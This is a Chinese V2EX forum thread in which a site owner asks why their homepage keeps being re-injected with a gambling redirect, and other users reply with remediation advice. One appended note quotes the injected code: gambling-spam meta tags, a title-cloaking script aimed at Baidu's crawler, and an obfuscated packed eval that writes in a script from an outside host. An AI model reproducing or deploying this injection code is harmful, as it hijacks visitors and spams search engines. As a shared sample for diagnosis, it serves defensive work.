首页   注册   登录
V2EX = way to explore
V2EX 是一个关于分享和探索的地方
现在注册
已注册用户请  登录
Distributions
Ubuntu
Fedora
CentOS
中文资源站
网易开源镜像站
V2EX  ›  Linux

求助,服务器被黑了,首页一直被修改加上一个转到某个博彩网址的 js,我把文件调成只读都没用,有思路是什么原因吗?

  •  
  •   doufenger · 248 天前 · 6187 次点击
    这是一个创建于 248 天前的主题,其中的信息可能已经有所发展或是发生改变。
    第 1 条附言  ·  247 天前
    感谢各位大佬,提供了很多个思路,我慢慢排查看先吧。 目前先换了服务器,可能存在问题的 PHP 就不放上去了。
    第 2 条附言  ·  247 天前
    我服务器是 linux 的
    第 3 条附言  ·  246 天前
    我换了服务器隐藏好 IP 了还是别挂了。被挂马的静态页被加了这样的代码

    <meta name="keywords" content="&#28595;&#38376;&#23041;&#23612;&#26031;&#22312;&#32447;&#24179;&#21488;&#44;&#23041;&#23612;&#26031;&#32593;&#19978;&#23089;&#20048;&#24179;&#21488;&#44;&#23041;&#23612;&#26031;&#24179;&#21488;&#23448;&#32593;&#44;&#23041;&#23612;&#26031;&#28216;&#25103;&#24179;&#21488;&#44;&#23041;&#23612;&#26031; "/>
    <meta name="description" content="&#12304;&#119;&#110;&#115;&#114;&#52;&#56;&#52;&#46;&#99;&#111;&#109;&#12305;&#23041;&#23612;&#26031;&#20154;&#23448;&#26041;&#32593;&#21487;&#20197;&#35753;&#22269;&#20869;&#30340;&#24456;&#22810;&#28216;&#25103;&#29609;&#23478;&#37117;&#24320;&#22987;&#21916;&#22909;&#19978;&#36825;&#31181;&#23089;&#20048;&#28216;&#25103;&#20307;&#39564;&#26041;&#24335;&#12290;&#36825;&#26159;&#20154;&#20204;&#25317;&#26377;&#23436;&#32654;&#19994;&#20313;&#29983;&#27963;&#30340;&#26377;&#25928;&#36884;&#24452;&#12290;&#36825;&#23545;&#25913;&#21892;&#29983;&#27963;&#36136;&#37327;&#30340;&#20316;&#29992;&#38750;&#24120;&#30340;&#37325;&#35201;&#12290;"/>
    <script>if(navigator.userAgent.toLocaleLowerCase().indexOf("baidu") == -1){document.title ="XX"}</script>
    <script type="text/javascript">
    eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('o["\\e\\c\\1\\n\\f\\8\\m\\0"]["\\7\\3\\9\\0\\8"](\'\\g\\2\\1\\3\\9\\4\\0 \\0\\k\\4\\8\\d\\6\\0\\8\\l\\0\\5\\h\\a\\j\\a\\2\\1\\3\\9\\4\\0\\6 \\2\\3\\1\\d\\6\\s\\0\\0\\4\\2\\t\\5\\5\\7\\7\\7\\b\\u\\1\\e\\a\\2\\r\\b\\1\\c\\f\\5\\j\\q\\p\\b\\h\\2\\6\\i\\g\\5\\2\\1\\3\\9\\4\\0\\i\');',31,31,'x74|x63|x73|x72|x70|x2f|x22|x77|x65|x69|x61|x2e|x6f|x3d|x64|x6d|x3c|x6a|x3e|x76|x79|x78|x6e|x75|window|x31|x36|x38|x68|x3a|x62'.split('|'),0,{}))</script>
    40 回复  |  直到 2018-08-19 11:32:53 +08:00
        1
    sabermiao   248 天前
    location.href?
    XSS?
        2
    doufenger   248 天前
    @sabermiao 他加的跳转代码删了就行了,关键是我改了服务器密码 FTP 密码什么的 文件调成只读了 都没有作用,他还是会改回来。
        3
    Devilker   248 天前
    目测 数据库被加入代码了
    只要一更新网站就会再次加上
        4
    helionzzz   248 天前
    先彻查服务器里的 php 文件 之后再改代码什么的
        5
    zarte   248 天前
    管理员权限被人拿了你调权限有啥用。。
        6
    keramist   248 天前 via Android
    需要运维 wx: antcars 可长期 可一次性
        7
    webjin1   248 天前
    前面套一个 WAF
        8
    zjp   248 天前 via Android
    root: 啥只读
    按惯例不应该是重装系统吗
        9
    caola   248 天前
    自己的网站被黑还检查不出什么问题?。。。
        10
    zhenghao110   248 天前 via Android
    @zjp 😂
        11
    yongxa   248 天前 via Android
    cron ?
        12
    sorcerer   248 天前 via Android
    网站被放后门了吧
        13
    gamexg   248 天前
    心太大了吧?
    被黑第一步排查原因,第二部重做系统。
    加只读是什么操作?
        14
    tulongtou   248 天前 via iPhone
    @helionzzz 为啥网站就一定有 php 文件
        15
    beastk   248 天前 via iPhone
    查日志看下怎么进来的,打补丁,做安全措施。
        16
    luboyan   248 天前
    我也遇到之前两个月,我遇到的是 PHP 的一个文件有后门。wordpress 下载第三方模版时候带来的
        17
    ccc008   248 天前
    我们公司也遇到过。清理所有 php 后门后还有。后来排查发现远程密码泄露了。233
        18
    haimall   248 天前 via Android
    先学习什么是后门,现在一般留 2-3 个后门的。 仔细检查下吧
        19
    godgrp   248 天前 via Android
    有可能 dns 劫持,上 https
        20
    mdos   248 天前
    文件先备份,然后重装服务器,密码都改掉,然后排查文件。等文件确认无后门后在传回服务器。
        21
    yanaraika   248 天前
    一定要备份已有代码、格盘、手动检查所有代码、重装服务器
        22
    houyujiangjun   248 天前
    明显是 cdn 劫持,上证书吧 骚年
        23
    iMusic   248 天前
    像电信搞的鬼
        24
    mytsing520   248 天前
    1.检查 rewrite ;
    2.检查代码;
    3.检查数据库
        25
    ztaosony   248 天前
    先检查有没有后门,然后把所有的密码都改一遍
        26
    1nclude   248 天前
    先查杀下 webshell,然后查看下日志,看看是怎么进来的
        27
    toarufan   248 天前
    难道不是 http 劫持了,上 https 吧
        28
    Akkuman   248 天前 via Android
    看起来像是 http 劫持,之前碰到过这种情况,上 https
        29
    feifei8868   248 天前   ♥ 1
    换个网络环境看一下,例如 电信有换联通或移动 看一下 如果只有一家服务商或一家的一个地区基本就确定是劫持,如果确定是了 就上 HTTPS 了 如果不是劫持,就"找人"检查程序服务器了
        30
    LvMax   248 天前 via iPhone
    D 盾扫服务器 找有没有 shell 其他的再说 基本上是被写 shell 了
        31
    a516307724   247 天前
    看起来像是 网络劫持,换个网络环境看看吧
        32
    ddzzhen   247 天前
    full ssl
        33
    abccccabc   247 天前
    楼主,查出来问题了没有?
        34
    VgV   247 天前
    瑟瑟发抖,加个只读这个操作真是可怕。。
    ps:楼上说的 http 劫持,能跳到菠菜?那有关部门第一时间就上门查运营商水表。
        35
    hu5ky   247 天前
    什么原因可以自己查日志分析怎么入侵的啊,,你这个什么逻辑????
        36
    uptime   247 天前
    格盘重装也有说的……
        37
    ihavecat   247 天前
    @VgV 确实,如果是运营商这种操作肯定会被举报的
        38
    laolinn   247 天前 via iPhone
    首先确认一下 PHP 环境是不是用了那些什么一键搭配来弄的,是的话赶紧换掉。看看日志文件有什么可疑地方,最后就是找时间把网站的漏洞修复一下
        39
    llllllLllll   246 天前
    看一下有没有异常进程
        40
    doufenger   246 天前
    我把被串改的代码贴到补充了 哪位大神看看
    关于   ·   FAQ   ·   API   ·   我们的愿景   ·   广告投放   ·   感谢   ·   实用小工具   ·   978 人在线   最高记录 5043   ·  
    创意工作者们的社区
    World is powered by solitude
    VERSION: 3.9.8.3 · 19ms · UTC 18:54 · PVG 02:54 · LAX 11:54 · JFK 14:54
    ♥ Do have faith in what you're doing.
    沪ICP备16043287号-1